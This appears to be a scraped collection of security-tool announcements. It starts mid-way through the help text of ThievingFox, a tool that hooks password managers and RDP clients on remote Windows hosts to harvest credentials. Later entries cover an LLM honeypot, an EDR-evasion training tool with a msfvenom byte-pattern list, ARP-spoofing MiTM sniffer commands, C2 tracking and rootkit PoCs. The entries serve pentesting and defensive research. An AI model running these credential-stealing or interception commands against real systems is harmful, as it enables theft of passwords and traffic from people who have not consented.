The path where KeePassXC is installed, without the share name (Default: /Program Files/KeePassXC/)
--ke epassxc-share KEEPASSXC_SHARE
The share on which KeePassXC is installed (Default: c$)
--mstsc Try to poison mstsc.exe
--mstsc-poison-hkcr Instead of poisonning all currently logged in users' HKCU hives, poison the HKCR hive for mstsc, which will also work for user that are currently not
logged in (Default: False)
--consent Try to poison Consent.exe
--logonui Try to poison LogonUI.exe
--rdcman Try to poison RDCMan.exe
--rdcman-poison-hkcr Instead of poisonning all currently logged in users' HKCU hives, poison the HKCR hive for RDCMan, which will also work for user that are currently not
logged in (Default: False)
--mobaxterm Try to poison MobaXTerm.exe
--mobaxterm-poison-hkcr
Instead of poisonning all currently logged in users' HKCU hives, poison the HKCR hive for MobaXTerm, which will also work for user that are currently not
logged in (Default: False)
--all Try to poison all applications

Cleanup

For each application specified in the command line parameters, the cleanup first removes poisonning artifacts that force the target application to load the hooking library. Then, it tries to delete the library that were uploaded to the remote host.

For applications that support poisonning of both HKCU and HKCR hives, both are cleaned up regardless.

Multiple applications can be specified at once, or, the --all flag can be used to cleanup all applications.

It does not clean extracted credentials on the remote host.

[!IMPORTANT] If the targeted application is in use while the cleanup module is ran, the DLL that are dropped on the target cannot be deleted. Nonetheless, the cleanup module will revert the configuration that enables the injection, which should ensure that the next time the application is launched, no injection is performed. Files that cannot be deleted by ThievingFox are logged.

$ python3 client/ThievingFox.py cleanup -h
usage: ThievingFox.py cleanup [-h] [-hashes HASHES] [-aesKey AESKEY] [-k] [-dc-ip DC_IP] [-no-pass] [--tempdir TEMPDIR] [--keepass] [--keepass-share KEEPASS_SHARE]
[--keepass-path KEEPASS_PATH] [--keepassxc] [--keepassxc-path KEEPASSXC_PATH] [--keepassxc-share KEEPASSXC_SHARE] [--mstsc] [--consent] [--logonui]
[--rdcman] [--mobaxterm] [--all]
target

positional arguments:
target Target machine or range [domain/]username[:password]@<IP or FQDN>[/CIDR]

options:
-h, --help show this help message and exit
-hashes HASHES, --hashes HASHES
LM:NT hash
-aesKey AESKEY, --aesKey AESKEY
AES key to use for Kerberos Authentication
-k Use kerberos authentication. For LogonUI, mstsc and cons ent modules, an anonymous NTLM authentication is performed, to retrieve the OS version.
-dc-ip DC_IP, --dc-ip DC_IP
IP Address of the domain controller
-no-pass, --no-pass Do not prompt for password
--tempdir TEMPDIR The name of the temporary directory to use for DLLs and output (Default: ThievingFox)
--keepass Try to cleanup all poisonning artifacts related to KeePass.exe
--keepass-share KEEPASS_SHARE
The share on which KeePass is installed (Default: c$)
--keepass-path KEEPASS_PATH
The path where KeePass is installed, without the share name (Default: /Program Files/KeePass Password Safe 2/)
--keepassxc Try to cleanup all poisonning artifacts related to KeePassXC.exe
--keepassxc-path KEEPASSXC_PATH
The path where KeePassXC is installed, without the share name (Default: /Program Files/KeePassXC/)
--keepassxc-share KEEPASSXC_SHARE
The share on which KeePassXC is installed (Default: c$)
--mstsc Try to cleanup all poisonning artifacts related to mstsc.exe
--consent Try to cleanup all poisonning artifacts related to Consent.exe
--logonui Try to cleanup all poisonning artifacts related to LogonUI.exe
--rdcman Try to cleanup all poisonning artifacts related to RDCMan.exe
--mobaxterm Try to cleanup all poisonning artifacts related to MobaXTerm.exe
--all Try to cleanup all poisonning artifacts related to all applications

Collect

For each application specified on the command line parameters, the collect module retrieves output files on the remote host stored inside C:\Windows\Temp\<tempdir> corresponding to the application, and decrypts them. The files are deleted from the remote host, and retrieved data is stored in client/ouput/.

Multiple applications can be specified at once, or, the --all flag can be used to collect logs from all applications.

$ python3 client/ThievingFox.py collect -h
usage: ThievingFox.py collect [-h] [-hashes HASHES] [-aesKey AESKEY] [-k] [-dc-ip DC_IP] [-no-pass] [--tempdir TEMPDIR] [--keepass] [--keepassxc] [--mstsc] [--consent]
[--logonui] [--rdcman] [--mobaxterm] [--all]
target

positional arguments:
target Target machine or range [domain/]username[:password]@<IP or FQDN>[/CIDR]

options:
-h, --help show this help message and exit
-hashes HASHES, --hashes HASHES
LM:NT hash
-aesKey AESKEY, --aesKey AESKEY
AES key to use for Kerberos Authentication
-k Use kerberos authentication. For LogonUI, mstsc and consent modules, an anonymous NTLM authentication is performed, to retrieve the OS version.
-dc-ip DC_IP, --dc-ip DC_IP
IP Address of th e domain controller
-no-pass, --no-pass Do not prompt for password
--tempdir TEMPDIR The name of the temporary directory to use for DLLs and output (Default: ThievingFox)
--keepass Collect KeePass.exe logs
--keepassxc Collect KeePassXC.exe logs
--mstsc Collect mstsc.exe logs
--consent Collect Consent.exe logs
--logonui Collect LogonUI.exe logs
--rdcman Collect RDCMan.exe logs
--mobaxterm Collect MobaXTerm.exe logs
--all Collect logs from all applications


Galah - An LLM-powered Web Honeypot Using The OpenAI API

By: Zion3R


TL;DR: Galah (/ษกษ™หˆlษ‘ห/ - pronounced 'guh-laa') is an LLM (Large Language Model) powered web honeypot, currently compatible with the OpenAI API, that is able to mimic various applications and dynamically respond to arbitrary HTTP requests.


Description

Named after the clever Australian parrot known for its mimicry, Galah mirrors this trait in its functionality. Unlike traditional web honeypots that rely on a manual and limiting method of emulating numerous web applications or vulnerabilities, Galah adopts a novel approach. This LLM-powered honeypot mimics various web applications by dynamically crafting relevant (and occasionally foolish) responses, including HTTP headers and body content, to arbitrary HTTP requests. Fun fact: in Aussie English, Galah also means fool!

I've deployed a cache for the LLM-generated responses (the cache duration can be customized in the config file) to avoid generating multiple responses for the same request and to reduce the cost of the OpenAI API. The cache stores responses per port, meaning if you probe a specific port of the honeypot, the generated response won't be returned for the same request on a different port.

The prompt is the most crucial part of this honeypot! You can update the prompt in the config file, but be sure not to change the part that instructs the LLM to generate the response in the specified JSON format.

Note: Galah was a fun weekend project I created to evaluate the capabilities of LLMs in generating HTTP messages, and it is not intended for production use. The honeypot may be fingerprinted based on its response time, non-standard, or sometimes weird responses, and other network-based techniques. Use this tool at your own risk, and be sure to set usage limits for your OpenAI API.

Future Enhancements

  • Rule-Based Response: The new version of Galah will employ a dynamic, rule-based approach, adding more control over response generation. This will further reduce OpenAI API costs and increase the accuracy of the generated responses.

  • Response Database: It will enable you to generate and import a response database. This ensures the honeypot only turns to the OpenAI API for unknown or new requests. I'm also working on cleaning up and sharing my own database.

  • Support for Other LLMs.

Getting Started

  • Ensure you have Go version 1.20+ installed.
  • Create an OpenAI API key from here.
  • If you want to serve over HTTPS, generate TLS certificates.
  • Clone the repo and install the dependencies.
  • Update the config.yaml file.
  • Build and run the Go binary!
% git clone git@github.com:0x4D31/galah.git
% cd galah
% go mod download
% go build
% ./galah -i en0 -v

โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆ โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆ โ–ˆโ–ˆ โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆ โ–ˆโ–ˆ โ–ˆโ–ˆ
โ–ˆโ–ˆ โ–ˆโ–ˆ โ–ˆโ–ˆ โ–ˆโ–ˆ โ–ˆโ–ˆ โ–ˆโ–ˆ โ–ˆโ–ˆ โ–ˆโ–ˆ
โ–ˆโ–ˆ โ–ˆโ–ˆโ–ˆ โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆ โ–ˆโ–ˆ โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆ โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆ
โ–ˆโ–ˆ โ–ˆโ–ˆ โ–ˆโ–ˆ โ–ˆโ–ˆ โ–ˆโ–ˆ โ–ˆโ–ˆ โ–ˆโ–ˆ โ–ˆโ–ˆ โ–ˆโ–ˆ
โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆ โ–ˆโ–ˆ โ–ˆโ–ˆ โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆ โ–ˆโ–ˆ โ–ˆโ–ˆ โ–ˆโ–ˆ โ–ˆโ–ˆ
llm-based web honeypot // version 1.0
author: Adel "0x4D31" Karimi

2024/01/01 04:29:10 Starting HTTP server on port 8080
2024/01/01 04:29:10 Starting HTTP server on port 8888
2024/01/01 04:29:10 Starting HTTPS server on port 8443 with TLS profile: profile1_selfsigned
2024/01/01 04:29:10 Starting HTTPS server on port 443 with TLS profile: profile1_selfsigned

2024/01/01 04:35:57 Received a request for "/.git/config" from [::1]:65434
2024/01/01 04:35:57 Request cache miss for "/.git/config": Not found in cache
2024/01/01 04:35:59 Generated HTTP response: {"Headers": {"Content-Type": "text/plain", "Server": "Apache/2.4.41 (Ubuntu)", "Status": "403 Forbidden"}, "Body": "Forbidden\nYou don't have permission to access this resource."}
2024/01/01 04:35:59 Sending the crafted response to [::1]:65434

^C2024/01/01 04:39:27 Received shutdown signal. Shutting down servers...
2024/01/01 04:39:27 All servers shut down gracefully.

Example Responses

Here are some example responses:

Example 1

% curl http://localhost:8080/login.php
<!DOCTYPE html><html><head><title>Login Page</title></head><body><form action='/submit.php' method='post'><label for='uname'><b>Username:</b></label><br><input type='text' placeholder='Enter Username' name='uname' required><br><label for='psw'><b>Password:</b></label><br><input type='password' placeholder='Enter Password' name='psw' required><br><button type='submit'>Login</button></form></body></html>

JSON log record:

{"timestamp":"2024-01-01T05:38:08.854878","srcIP":"::1","srcHost":"localhost","tags":null,"srcPort":"51978","sensorName":"home-sensor","port":"8080","httpRequest":{"method":"GET","protocolVersion":"HTTP/1.1","request":"/login.php","userAgent":"curl/7.71.1","headers":"User-Agent: [curl/7.71.1], Accept: [*/*]","headersSorted":"Accept,User-Agent","headersSortedSha256":"cf69e186169279bd51769f29d122b07f1f9b7e51bf119c340b66fbd2a1128bc9","body":"","bodySha256":"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855"},"httpResponse":{"headers":{"Content-Type":"text/html","Server":"Apache/2.4.38"},"body":"\u003c!DOCTYPE html\u003e\u003chtml\u003e\u003chead\u003e\u003ctitle\u003eLogin Page\u003c/title\u003e\u003c/head\u003e\u003cbody\u003e\u003cform action='/submit.php' method='post'\u003e\u003clabel for='uname'\u003e\u003cb\u003eUsername:\u003c/b\u003e\u003c/label\u003e\u003cbr\u003e\u003cinput type='text' placeholder='Enter Username' name='uname' required\u003e\u003cbr\u003e\u003clabel for='psw'\u003e\u003cb\u003ePassword:\u003c/b\u003e\u003c/label\u003e\u003cbr\u003e\u003cinput type='password' placeholder='Enter Password' name='psw' required\u003e\u003cbr\u003e\u003cbutton type='submit'\u003eLogin\u003c/button\u003e\u003c/form\u003e\u003c/body\u003e\u003c/html\u003e"}}

Example 2

% curl http://localhost:8080/.aws/credentials
[default]
aws_access_key_id = AKIAIOSFODNN7EXAMPLE
aws_secret_access_key = wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY
region = us-west-2

JSON log record:

{"timestamp":"2024-01-01T05:40:34.167361","srcIP":"::1","srcHost":"localhost","tags":null,"srcPort":"65311","sensorName":"home-sensor","port":"8080","httpRequest":{"method":"GET","protocolVersion":"HTTP/1.1","request":"/.aws/credentials","userAgent":"curl/7.71.1","headers":"User-Agent: [curl/7.71.1], Accept: [*/*]","headersSorted":"Accept,User-Agent","headersSortedSha256":"cf69e186169279bd51769f29d122b07f1f9b7e51bf119c340b66fbd2a1128bc9","body":"","bodySha256":"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855"},"httpResponse":{"headers":{"Connection":"close","Content-Encoding":"gzip","Content-Length":"126","Content-Type":"text/plain","Server":"Apache/2.4.51 (Unix)"},"body":"[default]\naws_access_key_id = AKIAIOSFODNN7EXAMPLE\naws_secret_access_key = wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY\nregion = us-west-2"}}

Okay, that was impressive!

Example 3

Now, let's do some sort of adversarial testing!

% curl http://localhost:8888/are-you-a-honeypot
No, I am a server.`

JSON log record:

{"timestamp":"2024-01-01T05:50:43.792479","srcIP":"::1","srcHost":"localhost","tags":null,"srcPort":"61982","sensorName":"home-sensor","port":"8888","httpRequest":{"method":"GET","protocolVersion":"HTTP/1.1","request":"/are-you-a-honeypot","userAgent":"curl/7.71.1","headers":"User-Agent: [curl/7.71.1], Accept: [*/*]","headersSorted":"Accept,User-Agent","headersSortedSha256":"cf69e186169279bd51769f29d122b07f1f9b7e51bf119c340b66fbd2a1128bc9","body":"","bodySha256":"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855"},"httpResponse":{"headers":{"Connection":"close","Content-Length":"20","Content-Type":"text/plain","Server":"Apache/2.4.41 (Ubuntu)"},"body":"No, I am a server."}}

๐Ÿ˜‘

% curl http://localhost:8888/i-mean-are-you-a-fake-server`
No, I am not a fake server.

JSON log record:

{"timestamp":"2024-01-01T05:51:40.812831","srcIP":"::1","srcHost":"localhost","tags":null,"srcPort":"62205","sensorName":"home-sensor","port":"8888","httpRequest":{"method":"GET","protocolVersion":"HTTP/1.1","request":"/i-mean-are-you-a-fake-server","userAgent":"curl/7.71.1","headers":"User-Agent: [curl/7.71.1], Accept: [*/*]","headersSorted":"Accept,User-Agent","headersSortedSha256":"cf69e186169279bd51769f29d122b07f1f9b7e51bf119c340b66fbd2a1128bc9","body":"","bodySha256":"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855"},"httpResponse":{"headers":{"Connection":"close","Content-Type":"text/plain","Server":"LocalHost/1.0"},"body":"No, I am not a fake server."}}

You're a galah, mate!



CrimsonEDR - Simulate The Behavior Of AV/EDR For Malware Development Training

By: Zion3R


CrimsonEDR is an open-source project engineered to identify specific malware patterns, offering a tool for honing skills in circumventing Endpoint Detection and Response (EDR). By leveraging diverse detection methods, it empowers users to deepen their understanding of security evasion tactics.


Features

Detection Description
Direct Syscall Detects the usage of direct system calls, often employed by malware to bypass traditional API hooks.
NTDLL Unhooking Identifies attempts to unhook functions within the NTDLL library, a common evasion technique.
AMSI Patch Detects modifications to the Anti-Malware Scan Interface (AMSI) through byte-level analysis.
ETW Patch Detects byte-level alterations to Event Tracing for Windows (ETW), commonly manipulated by malware to evade detection.
PE Stomping Identifies instances of PE (Portable Executable) stomping.
Reflective PE Loading Detects the reflective loading of PE files, a technique employed by malware to avoid static analysis.
Unbacked Thread Origin Identifies threads originating from unbacked memory regions, often indicative of malicious activity.
Unbacked Thread Start Address Detects threads with start addresses pointing to unbacked memory, a potential sign of code injection.
API hooking Places a hook on the NtWriteVirtualMemory function to monitor memory modifications.
Custom Pattern Search Allows users to search for specific patterns provided in a JSON file, facilitating the identification of known malware signatures.

Installation

To get started with CrimsonEDR, follow these steps:

  1. Install dependancy: bash sudo apt-get install gcc-mingw-w64-x86-64
  2. Clone the repository: bash git clone https://github.com/Helixo32/CrimsonEDR
  3. Compile the project: bash cd CrimsonEDR; chmod +x compile.sh; ./compile.sh

โš ๏ธ Warning

Windows Defender and other antivirus programs may flag the DLL as malicious due to its content containing bytes used to verify if the AMSI has been patched. Please ensure to whitelist the DLL or disable your antivirus temporarily when using CrimsonEDR to avoid any interruptions.

Usage

To use CrimsonEDR, follow these steps:

  1. Make sure the ioc.json file is placed in the current directory from which the executable being monitored is launched. For example, if you launch your executable to monitor from C:\Users\admin\, the DLL will look for ioc.json in C:\Users\admin\ioc.json. Currently, ioc.json contains patterns related to msfvenom. You can easily add your own in the following format:
{
"IOC": [
["0x03", "0x4c", "0x24", "0x08", "0x45", "0x39", "0xd1", "0x75"],
["0xf1", "0x4c", "0x03", "0x4c", "0x24", "0x08", "0x45", "0x39"],
["0x58", "0x44", "0x8b", "0x40", "0x24", "0x49", "0x01", "0xd0"],
["0x66", "0x41", "0x8b", "0x0c", "0x48", "0x44", "0x8b", "0x40"],
["0x8b", "0x0c", "0x48", "0x44", "0x8b", "0x40", "0x1c", "0x49"],
["0x01", "0xc1", "0x38", "0xe0", "0x75", "0xf1", "0x4c", "0x03"],
["0x24", "0x49", "0x01", "0xd0", "0x66", "0x41", "0x8b", "0x0c"],
["0xe8", "0xcc", "0x00", "0x00", "0x00", "0x41", "0x51", "0x41"]
]
}
  1. Execute CrimsonEDRPanel.exe with the following arguments:

    • -d <path_to_dll>: Specifies the path to the CrimsonEDR.dll file.

    • -p <process_id>: Specifies the Process ID (PID) of the target process where you want to inject the DLL.

For example:

.\CrimsonEDRPanel.exe -d C:\Temp\CrimsonEDR.dll -p 1234

Useful Links

Here are some useful resources that helped in the development of this project:

Contact

For questions, feedback, or support, please reach out to me via:



Url-Status-Checker - Tool For Swiftly Checking The Status Of URLs

By: Zion3R



Status Checker is a Python script that checks the status of one or multiple URLs/domains and categorizes them based on their HTTP status codes. Version 1.0.0 Created BY BLACK-SCORP10 t.me/BLACK-SCORP10

Features

  • Check the status of single or multiple URLs/domains.
  • Asynchronous HTTP requests for improved performance.
  • Color-coded output for better visualization of status codes.
  • Progress bar when checking multiple URLs.
  • Save results to an output file.
  • Error handling for inaccessible URLs and invalid responses.
  • Command-line interface for easy usage.

Installation

  1. Clone the repository:

bash git clone https://github.com/your_username/status-checker.git cd status-checker

  1. Install dependencies:

bash pip install -r requirements.txt

Usage

python status_checker.py [-h] [-d DOMAIN] [-l LIST] [-o OUTPUT] [-v] [-update]
  • -d, --domain: Single domain/URL to check.
  • -l, --list: File containing a list of domains/URLs to check.
  • -o, --output: File to save the output.
  • -v, --version: Display version information.
  • -update: Update the tool.

Example:

python status_checker.py -l urls.txt -o results.txt

Preview:

License

This project is licensed under the MIT License - see the LICENSE file for details.



CSAF - Cyber Security Awareness Framework

By: Zion3R

The Cyber Security Awareness Framework (CSAF) is a structured approach aimed at enhancing Cybersecurity" title="Cybersecurity">cybersecurity awareness and understanding among individuals, organizations, and communities. It provides guidance for the development of effective Cybersecurity" title="Cybersecurity">cybersecurity awareness programs, covering key areas such as assessing awareness needs, creating educational m aterials, conducting training and simulations, implementing communication campaigns, and measuring awareness levels. By adopting this framework, organizations can foster a robust security culture, enhance their ability to detect and respond to cyber threats, and mitigate the risks associated with attacks and security breaches.


Requirements

Software

  • Docker
  • Docker-compose

Hardware

Minimum

  • 4 Core CPU
  • 10GB RAM
  • 60GB Disk free

Recommendation

  • 8 Core CPU or above
  • 16GB RAM or above
  • 100GB Disk free or above

Installation

Clone the repository

git clone https://github.com/csalab-id/csaf.git

Navigate to the project directory

cd csaf

Pull the Docker images

docker-compose --profile=all pull

Generate wazuh ssl certificate

docker-compose -f generate-indexer-certs.yml run --rm generator

For security reason you should set env like this first

export ATTACK_PASS=ChangeMePlease
export DEFENSE_PASS=ChangeMePlease
export MONITOR_PASS=ChangeMePlease
export SPLUNK_PASS=ChangeMePlease
export GOPHISH_PASS=ChangeMePlease
export MAIL_PASS=ChangeMePlease
export PURPLEOPS_PASS=ChangeMePlease

Start all the containers

docker-compose --profile=all up -d

You can run specific profiles for running specific labs with the following profiles - all - attackdefenselab - phisinglab - breachlab - soclab

For example

docker-compose --profile=attackdefenselab up -d

Proof



Exposed Ports

An exposed port can be accessed using a proxy socks5 client, SSH client, or HTTP client. Choose one for the best experience.

  • Port 6080 (Access to attack network)
  • Port 7080 (Access to defense network)
  • Port 8080 (Access to monitor network)

Example usage

Access internal network with proxy socks5

  • curl --proxy socks5://ipaddress:6080 http://10.0.0.100/vnc.html
  • curl --proxy socks5://ipaddress:7080 http://10.0.1.101/vnc.html
  • curl --proxy socks5://ipaddress:8080 http://10.0.3.102/vnc.html

Remote ssh with ssh client

  • ssh kali@ipaddress -p 6080 (default password: attackpassword)
  • ssh kali@ipaddress -p 7080 (default password: defensepassword)
  • ssh kali@ipaddress -p 8080 (default password: monitorpassword)

Access kali linux desktop with curl / browser

  • curl http://ipaddress:6080/vnc.html
  • curl http://ipaddress:7080/vnc.html
  • curl http://ipaddress:8080/vnc.html

Domain Access

  • http://attack.lab/vnc.html (default password: attackpassword)
  • http://defense.lab/vnc.html (default password: defensepassword)
  • http://monitor.lab/vnc.html (default password: monitorpassword)
  • https://gophish.lab:3333/ (default username: admin, default password: gophishpassword)
  • https://server.lab/ (default username: postmaster@server.lab, default passowrd: mailpassword)
  • https://server.lab/iredadmin/ (default username: postmaster@server.lab, default passowrd: mailpassword)
  • https://mail.server.lab/ (default username: postmaster@server.lab, default passowrd: mailpassword)
  • https://mail.server.lab/iredadmin/ (default username: postmaster@server.lab, default passowrd: mailpassword)
  • http://phising.lab/
  • http://10.0.0.200:8081/
  • http://gitea.lab/ (default username: csalab, default password: giteapassword)
  • http://dvwa.lab/ (default username: admin, default passowrd: password)
  • http://dvwa-monitor.lab/ (default username: admin, default passowrd: password)
  • http://dvwa-modsecurity.lab/ (default username: admin, default passowrd: password)
  • http://wackopicko.lab/
  • http://juiceshop.lab/
  • https://wazuh-indexer.lab:9200/ (default username: admin, default passowrd: SecretPassword)
  • https://wazuh-manager.lab/
  • https://wazuh-dashboard.lab:5601/ (default username: admin, default passowrd: SecretPassword)
  • http://splunk.lab/ (default username: admin, default password: splunkpassword)
  • https://infectionmonkey.lab:5000/
  • http://purpleops.lab/ (default username: admin@purpleops.com, default password: purpleopspassword)
  • http://caldera.lab/ (default username: red/blue, default password: calderapassword)

Network / IP Address

Attack

  • 10.0.0.100 attack.lab
  • 10.0.0.200 phising.lab
  • 10.0.0.201 server.lab
  • 10.0.0.201 mail.server.lab
  • 10.0.0.202 gophish.lab
  • 10.0.0.110 infectionmonkey.lab
  • 10.0.0.111 mongodb.lab
  • 10.0.0.112 purpleops.lab
  • 10.0.0.113 caldera.lab

Defense

  • 10.0.1.101 defense.lab
  • 10.0.1.10 dvwa.lab
  • 10.0.1.13 wackopicko.lab
  • 10.0.1.14 juiceshop.lab
  • 10.0.1.20 gitea.lab
  • 10.0.1.110 infectionmonkey.lab
  • 10.0.1.112 purpleops.lab
  • 10.0.1.113 caldera.lab

Monitor

  • 10.0.3.201 server.lab
  • 10.0.3.201 mail.server.lab
  • 10.0.3.9 mariadb.lab
  • 10.0.3.10 dvwa.lab
  • 10.0.3.11 dvwa-monitor.lab
  • 10.0.3.12 dvwa-modsecurity.lab
  • 10.0.3.102 monitor.lab
  • 10.0.3.30 wazuh-manager.lab
  • 10.0.3.31 wazuh-indexer.lab
  • 10.0.3.32 wazuh-dashboard.lab
  • 10.0.3.40 splunk.lab

Public

  • 10.0.2.101 defense.lab
  • 10.0.2.13 wackopicko.lab

Internet

  • 10.0.4.102 monitor.lab
  • 10.0.4.30 wazuh-manager.lab
  • 10.0.4.32 wazuh-dashboard.lab
  • 10.0.4.40 splunk.lab

Internal

  • 10.0.5.100 attack.lab
  • 10.0.5.12 dvwa-modsecurity.lab
  • 10.0.5.13 wackopicko.lab

License

This Docker Compose application is released under the MIT License. See the LICENSE file for details.



Espionage - A Linux Packet Sniffing Suite For Automated MiTM Attacks

By: Zion3R

Espionage is a network packet sniffer that intercepts large amounts of data being passed through an interface. The tool allows users to to run normal and verbose traffic analysis that shows a live feed of traffic, revealing packet direction, protocols, flags, etc. Espionage can also spoof ARP so, all data sent by the target gets redirected through the attacker (MiTM). Espionage supports IPv4, TCP/UDP, ICMP, and HTTP. Espionag e was written in Python 3.8 but it also supports version 3.6. This is the first version of the tool so please contact the developer if you want to help contribute and add more to Espionage. Note: This is not a Scapy wrapper, scapylib only assists with HTTP requests and ARP.


Installation

1: git clone https://www.github.com/josh0xA/Espionage.git
2: cd Espionage
3: sudo python3 -m pip install -r requirments.txt
4: sudo python3 espionage.py --help

Usage

  1. sudo python3 espionage.py --normal --iface wlan0 -f capture_output.pcap
    Command 1 will execute a clean packet sniff and save the output to the pcap file provided. Replace wlan0 with whatever your network interface is.
  2. sudo python3 espionage.py --verbose --iface wlan0 -f capture_output.pcap
    Command 2 will execute a more detailed (verbose) packet sniff and save the output to the pcap file provided.
  3. sudo python3 espionage.py --normal --iface wlan0
    Command 3 will still execute a clean packet sniff however, it will not save the data to a pcap file. Saving the sniff is recommended.
  4. sudo python3 espionage.py --verbose --httpraw --iface wlan0
    Command 4 will execute a verbose packet sniff and will also show raw http/tcp packet data in bytes.
  5. sudo python3 espionage.py --target <target-ip-address> --iface wlan0
    Command 5 will ARP spoof the target ip address and all data being sent will be routed back to the attackers machine (you/localhost).
  6. sudo python3 espionage.py --iface wlan0 --onlyhttp
    Command 6 will only display sniffed packets on port 80 utilizing the HTTP protocol.
  7. sudo python3 espionage.py --iface wlan0 --onlyhttpsecure
    Command 7 will only display sniffed packets on port 443 utilizing the HTTPS (secured) protocol.
  8. sudo python3 espionage.py --iface wlan0 --urlonly
    Command 8 will only sniff and return sniffed urls visited by the victum. (works best with sslstrip).

  9. Press Ctrl+C in-order to stop the packet interception and write the output to file.

Menu

usage: espionage.py [-h] [--version] [-n] [-v] [-url] [-o] [-ohs] [-hr] [-f FILENAME] -i IFACE
[-t TARGET]

optional arguments:
-h, --help show this help message and exit
--version returns the packet sniffers version.
-n, --normal executes a cleaner interception, less sophisticated.
-v, --verbose (recommended) executes a more in-depth packet interception/sniff.
-url, --urlonly only sniffs visited urls using http/https.
-o, --onlyhttp sniffs only tcp/http data, returns urls visited.
-ohs, --onlyhttpsecure
sniffs only https data, (port 443).
-hr, --httpraw displays raw packet data (byte order) recieved or sent on port 80.

(Recommended) arguments for data output (.pcap):
-f FILENAME, --filename FILENAME
name of file to store the output (make extension '.pcap').

(Required) arguments required for execution:
-i IFACE, --iface IFACE
specify network interface (ie. wlan0, eth0, wlan1, etc.)

(ARP Spoofing) required arguments in-order to use the ARP Spoofing utility:
-t TARGET, --target TARGET

A Linux Packet Sniffing Suite for Automated MiTM Attacks (6)

Writeup

A simple medium writeup can be found here:
Click Here For The Official Medium Article

Ethical Notice

The developer of this program, Josh Schiavone, written the following code for educational and ethical purposes only. The data sniffed/intercepted is not to be used for malicous intent. Josh Schiavone is not responsible or liable for misuse of this penetration testing tool. May God bless you all.

License

MIT License
Copyright (c) 2024 Josh Schiavone




HackerInfo - Infromations Web Application Security

By: Zion3R




Infromations Web Application Security


install :

sudo apt install python3 python3-pip

pip3 install termcolor

pip3 install google

pip3 install optioncomplete

pip3 install bs4


pip3 install prettytable

git clone https://github.com/Matrix07ksa/HackerInfo/

cd HackerInfo

chmod +x HackerInfo

./HackerInfo -h



python3 HackerInfo.py -d www.facebook.com -f pdf
[+] <-- Running Domain_filter_File ....-->
[+] <-- Searching [www.facebook.com] Files [pdf] ....-->
https://www.facebook.com/gms_hub/share/dcvsda_wf.pdf
https://www.facebook.com/gms_hub/share/facebook_groups_for_pages.pdf
https://www.facebook.com/gms_hub/share/videorequirementschart.pdf
https://www.facebook.com/gms_hub/share/fundraise-on-facebook_hi_in.pdf
https://www.facebook.com/gms_hub/share/bidding-strategy_decision-tree_en_us.pdf
https://www.facebook.com/gms_hub/share/fundraise-on-facebook_es_la.pdf
https://www.facebook.com/gms_hub/share/fundraise-on-facebook_ar.pdf
https://www.facebook.com/gms_hub/share/fundraise-on-facebook_ur_pk.pdf
https://www.facebook.com/gms_hub/share/fundraise-on-facebook_cs_cz.pdf
https://www.facebook.com/gms_hub/share/fundraise-on-facebook_it_it.pdf
https://www.facebook.com/gms_hub/share/fundraise-on-facebook_pl_pl.pdf
h ttps://www.facebook.com/gms_hub/share/fundraise-on-facebook_nl.pdf
https://www.facebook.com/gms_hub/share/fundraise-on-facebook_pt_br.pdf
https://www.facebook.com/gms_hub/share/creative-best-practices_id_id.pdf
https://www.facebook.com/gms_hub/share/creative-best-practices_fr_fr.pdf
https://www.facebook.com/gms_hub/share/fundraise-on-facebook_tr_tr.pdf
https://www.facebook.com/gms_hub/share/creative-best-practices_hi_in.pdf
https://www.facebook.com/rsrc.php/yA/r/AVye1Rrg376.pdf
https://www.facebook.com/gms_hub/share/creative-best-practices_ur_pk.pdf
https://www.facebook.com/gms_hub/share/creative-best-practices_nl_nl.pdf
https://www.facebook.com/gms_hub/share/creative-best-practices_de_de.pdf
https://www.facebook.com/gms_hub/share/fundraise-on-facebook_de_de.pdf
https://www.facebook.com/gms_hub/share/creative-best-practices_cs_cz.pdf
https://www.facebook.com/gms_hub/share/fundraise-on-facebook_sk_sk.pdf
https://www.facebook.com/gms _hub/share/creative-best-practices_japanese_jp.pdf
#####################[Finshid]########################

Usage:

Hackerinfo infromations Web Application Security (11)

Library install hackinfo:

sudo python setup.py install
pip3 install hackinfo



C2-Tracker - Live Feed Of C2 Servers, Tools, And Botnets

By: Zion3R


Free to use IOC feed for various tools/malware. It started out for just C2 tools but has morphed into tracking infostealers and botnets as well. It uses shodan.io/">Shodan searches to collect the IPs. The most recent collection is always stored in data; the IPs are broken down by tool and there is an all.txt.

The feed should update daily. Actively working on making the backend more reliable


Honorable Mentions

Many of the Shodan queries have been sourced from other CTI researchers:

Huge shoutout to them!

Thanks to BertJanCyber for creating the KQL query for ingesting this feed

And finally, thanks to Y_nexro for creating C2Live in order to visualize the data

What do I track?

Running Locally

If you want to host a private version, put your Shodan API key in an environment variable called SHODAN_API_KEY

echo SHODAN_API_KEY=API_KEY >> ~/.bashrc
bash
python3 -m pip install -r requirements.txt
python3 tracker.py

Contributing

I encourage opening an issue/PR if you know of any additional Shodan searches for identifying adversary infrastructure. I will not set any hard guidelines around what can be submitted, just know, fidelity is paramount (high true/false positive ratio is the focus).

References



VectorKernel - PoCs For Kernelmode Rootkit Techniques Research

By: Zion3R


PoCs for Kernelmode rootkit techniques research or education. Currently focusing on Windows OS. All modules support 64bit OS only.

NOTE

Some modules use ExAllocatePool2 API to allocate kernel pool memory. ExAllocatePool2 API is not supported in OSes older than Windows 10 Version 2004. If you want to test the modules in old OSes, replace ExAllocatePool2 API with ExAllocatePoolWithTag API.

ย 

Environment

All modules are tested in Windows 11 x64. To test drivers, following options can be used for the testing machine:

  1. Enable Loading of Test Signed Drivers

